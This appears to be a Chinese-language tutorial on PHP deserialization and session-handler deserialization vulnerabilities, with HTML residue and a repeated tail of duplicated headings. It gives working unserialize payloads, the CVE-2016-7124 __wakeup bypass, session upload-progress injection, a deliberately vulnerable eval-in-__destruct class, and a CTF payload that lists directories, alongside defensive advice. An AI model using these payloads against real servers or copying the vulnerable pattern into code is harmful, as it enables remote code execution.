PHP反序列化与Session反序列化漏洞详解<\/h1>

一、PHP序列化基础<\/h2>

1. 序列化函数：serialize()<\/h3>

PHP中的serialize()<\/code>函数可以将任何PHP值转换为可存储的字符串表示形式。<\/p>

$s =<\/span> serialize<\/span>($变量); \/\/ 将变量数据序列化为字符串
<\/span><\/span><\/span><\/span>file_put_contents<\/span>('.\/目标文本文件'<\/span>, $s); \/\/ 将序列化字符串保存到文件
<\/span><\/span><\/span><\/code><\/pre>2. 序列化格式解析<\/h3>
示例：<\/p>
class<\/span> User<\/span> {
<\/span><\/span>    public<\/span> $name =<\/span> 'lemon'<\/span>;
<\/span><\/span>    public<\/span> $age =<\/span> 20<\/span>;
<\/span><\/span>}
<\/span><\/span>$user =<\/span> new<\/span> User<\/span>();
<\/span><\/span>echo<\/span> serialize<\/span>($user);
<\/span><\/span>\/\/ 输出: O:4:"User":2:{s:4:"name";s:5:"lemon";s:3:"age";i:20;}
<\/span><\/span><\/span><\/code><\/pre>格式说明：<\/p>
O:4:"User":2:{s:4:"name";s:5:"lemon";s:3:"age";i:20;}
<\/code><\/pre>

O<\/code> - 对象类型<\/li>
4<\/code> - 类名长度<\/li>
User<\/code> - 类名<\/li>
2<\/code> - 属性数量<\/li>
{...}<\/code> - 属性列表，格式为类型:长度:"名称";值<\/code><\/li>
<\/ul>
类型缩写：<\/p>
a - array        b - boolean    d - double
i - integer      o - common object
r - reference    s - string     C - custom object
O - class        N - null       R - pointer reference
U - unicode string
<\/code><\/pre>
二、PHP反序列化基础<\/h2>
1. 反序列化函数：unserialize()<\/h3>
$s =<\/span> file_get_contents<\/span>('.\/目标文本文件'<\/span>);
<\/span><\/span>$变量 =<\/span> unserialize<\/span>($s); \/\/ 将序列化字符串还原为PHP变量
<\/span><\/span><\/span><\/code><\/pre>重要注意事项<\/strong>：<\/p>

在反序列化对象前，该对象的类必须在当前作用域中已定义<\/li>
否则会触发错误<\/li>
<\/ul>
2. 反序列化过程示例<\/h3>
class<\/span> User<\/span> {
<\/span><\/span>    public<\/span> $name;
<\/span><\/span>    public<\/span> $age;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$serialized =<\/span> 'O:4:"User":2:{s:4:"name";s:5:"lemon";s:3:"age";i:20;}'<\/span>;
<\/span><\/span>$user =<\/span> unserialize<\/span>($serialized);
<\/span><\/span>echo<\/span> "User <\/span>{<\/span>$user-><\/span>name<\/span>}<\/span> is <\/span>{<\/span>$user-><\/span>age<\/span>}<\/span> years old."<\/span>;
<\/span><\/span><\/code><\/pre>三、PHP反序列化漏洞<\/h2>
1. 魔法函数（魔术方法）<\/h3>
PHP中以__<\/code>开头的类方法为魔术方法，会在特定条件下自动调用：<\/p>
__construct<\/span>()    \/\/ 对象创建时调用
<\/span><\/span><\/span><\/span>__destruct<\/span>()     \/\/ 对象销毁时调用
<\/span><\/span><\/span><\/span>__toString<\/span>()     \/\/ 对象被当作字符串使用时调用
<\/span><\/span><\/span><\/span>__wakeup<\/span>()       \/\/ 使用unserialize时触发
<\/span><\/span><\/span><\/span>__sleep<\/span>()        \/\/ 使用serialize时触发
<\/span><\/span><\/span><\/span>__call<\/span>()         \/\/ 调用不可访问方法时触发
<\/span><\/span><\/span>\/\/ 其他魔术方法...
<\/span><\/span><\/span><\/code><\/pre>2. 漏洞产生条件<\/h3>
反序列化漏洞需要满足两个前提：<\/p>

unserialize()<\/code>的参数可控（用户可输入）<\/li>
代码中定义了含有魔术方法的类，且方法中存在使用类成员变量作为参数的危险函数<\/li>
<\/ol>
3. 漏洞利用示例<\/h3>
class<\/span> A<\/span> {
<\/span><\/span>    var<\/span> $test =<\/span> "demo"<\/span>;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        echo<\/span> $this-><\/span>test<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$a =<\/span> $_GET['test'<\/span>];
<\/span><\/span>$a_unser =<\/span> unserialize<\/span>($a);
<\/span><\/span><\/code><\/pre>攻击者可构造payload：<\/p>
?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}
<\/code><\/pre>
更危险的例子：<\/p>
class<\/span> A<\/span> {
<\/span><\/span>    var<\/span> $test =<\/span> "demo"<\/span>;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        @<\/span>eval<\/span>($this-><\/span>test<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$test =<\/span> $_POST['test'<\/span>];
<\/span><\/span>$len =<\/span> strlen<\/span>($test)+<\/span>1<\/span>;
<\/span><\/span>$pp =<\/span> "O:1:<\/span>\"<\/span>A<\/span>\"<\/span>:1:{s:4:<\/span>\"<\/span>test<\/span>\"<\/span>;s:"<\/span>.<\/span>$len.<\/span>":<\/span>\"<\/span>"<\/span>.<\/span>$test.<\/span>";<\/span>\"<\/span>;}"<\/span>;
<\/span><\/span>$test_unser =<\/span> unserialize<\/span>($pp);
<\/span><\/span><\/code><\/pre>四、绕过魔法函数的技巧<\/h2>
1. CVE-2016-7124漏洞<\/h3>
影响版本<\/strong>：<\/p>

PHP5 < 5.6.25<\/li>
PHP7 < 7.0.10<\/li>
<\/ul>
绕过原理<\/strong>：

当反序列化字符串中表示属性个数的值大于真实属性个数时，会绕过__wakeup()<\/code>函数的执行<\/p>
2. 绕过示例<\/h3>
原始序列化：<\/p>
O<\/span>:<\/span>4<\/span>:<\/span>"Demo"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>10<\/span>:<\/span>"Demofile"<\/span>;s<\/span>:<\/span>16<\/span>:<\/span>"Gu3ss_m3_h2h2.php"<\/span>;}
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

修改属性数量：O:4:"Demo":2:{s:10:"Demofile";s:16:"Gu3ss_m3_h2h2.php";}<\/code><\/li>
绕过正则检测：O:+4:"Demo":2:{s:10:"Demofile";s:16:"f15g_1s_here.php";}<\/code><\/li>
<\/ol>
五、Session反序列化攻击<\/h2>
1. Session基础知识<\/h3>
Session作用<\/strong>：

存储特定用户会话所需的属性及配置信息，在用户访问网站期间保持不变<\/p>
Session存储<\/strong>：

默认存储在服务器文件中，路径可通过php.ini<\/code>的session.save_path<\/code>配置<\/p>
2. Session处理引擎<\/h3>
PHP有三种session序列化处理器：<\/p>



处理器<\/th>
存储格式<\/th>
<\/tr>
<\/thead>


php<\/td>
键名|序列化值<\/td>
<\/tr>

php_serialize<\/td>
序列化整个$_SESSION数组<\/td>
<\/tr>

php_binary<\/td>
键名长度+键名+序列化值<\/td>
<\/tr>
<\/tbody>
<\/table>
3. 漏洞产生条件<\/h3>
当应用程序混合使用不同的session处理器时，可能导致反序列化漏洞<\/p>
4. 攻击示例<\/h3>
场景1<\/strong>：直接操作$_SESSION<\/p>
1.php (使用php_serialize):<\/p>
ini_set<\/span>('session.serialize_handler'<\/span>, 'php_serialize'<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>$_SESSION['lemon'<\/span>] =<\/span> $_GET['a'<\/span>];
<\/span><\/span><\/code><\/pre>2.php (使用php):<\/p>
ini_set<\/span>('session.serialize_handler'<\/span>, 'php'<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>class<\/span> student<\/span> {
<\/span><\/span>    function<\/span> __wakeup() {
<\/span><\/span>        echo<\/span> "Hacked!"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤：<\/p>

访问1.php传入payload：?a=|O:7:"student":0:{}<\/code><\/li>
访问2.php触发反序列化<\/li>
<\/ol>
场景2<\/strong>：利用upload_process机制<\/p>
当无法直接操作$_SESSION时，可利用PHP的文件上传进度特性：<\/p>
<form<\/span> action<\/span>=<\/span>"target.php"<\/span> method<\/span>=<\/span>"POST"<\/span> enctype<\/span>=<\/span>"multipart\/form-data"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"PHP_SESSION_UPLOAD_PROGRESS"<\/span> value<\/span>=<\/span>"|payload"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"file"<\/span> name<\/span>=<\/span>"file"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>六、防御措施<\/h2>

不要反序列化不可信的用户输入<\/li>
使用一致的session序列化处理器<\/li>
对序列化数据进行签名验证<\/li>
使用session_regenerate_id()<\/code>防止session固定攻击<\/li>
及时更新PHP版本，修复已知漏洞<\/li>
<\/ol>
七、实战案例<\/h2>
1. Jarvis OJ - PHPINFO题目分析<\/h3>
漏洞点<\/strong>：<\/p>

默认session处理器为php_serialize<\/li>
题目使用php处理器<\/li>
利用upload_process机制注入恶意序列化数据<\/li>
<\/ul>
攻击步骤<\/strong>：<\/p>

构造payload序列化对象<\/li>
通过文件上传表单注入session<\/li>
触发反序列化执行任意代码<\/li>
<\/ol>
class<\/span> OowoO<\/span> {
<\/span><\/span>    public<\/span> $mdzz =<\/span> "print_r(scandir(dirname(__FILE__)));"<\/span>;
<\/span><\/span>}
<\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> OowoO<\/span>());
<\/span><\/span>\/\/ 构造: |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>
PHP反序列化漏洞是Web安全中的重要攻击面，理解其原理和利用方式对于安全研究和防御都至关重要。关键点包括：<\/p>

序列化\/反序列化过程<\/li>
魔术方法的触发条件<\/li>
Session处理器的差异<\/li>
实际环境中的利用技巧<\/li>
<\/ul>
通过深入理解这些机制，可以更好地发现和防御相关漏洞。<\/p>

PHP反序列化与Session反序列化漏洞详解<\/h1>

一、PHP序列化基础<\/h2>

二、PHP反序列化基础<\/h2>

三、PHP反序列化漏洞<\/h2>

四、绕过魔法函数的技巧<\/h2>

五、Session反序列化攻击<\/h2>

1. Session基础知识<\/h3> Session作用<\/strong>： 存储特定用户会话所需的属性及配置信息，在用户访问网站期间保持不变<\/p> Session存储<\/strong>： 默认存储在服务器文件中，路径可通过php.ini<\/code>的session.save_path<\/code>配置<\/p>

3. 漏洞产生条件<\/h3> 当应用程序混合使用不同的session处理器时，可能导致反序列化漏洞<\/p>

七、实战案例<\/h2>

1. Session基础知识<\/h3>
Session作用<\/strong>：
存储特定用户会话所需的属性及配置信息，在用户访问网站期间保持不变<\/p>
Session存储<\/strong>：
默认存储在服务器文件中，路径可通过`php.ini<\/code>的session.save_path<\/code>配置<\/p>`

3. 漏洞产生条件<\/h3>
当应用程序混合使用不同的session处理器时，可能导致反序列化漏洞<\/p>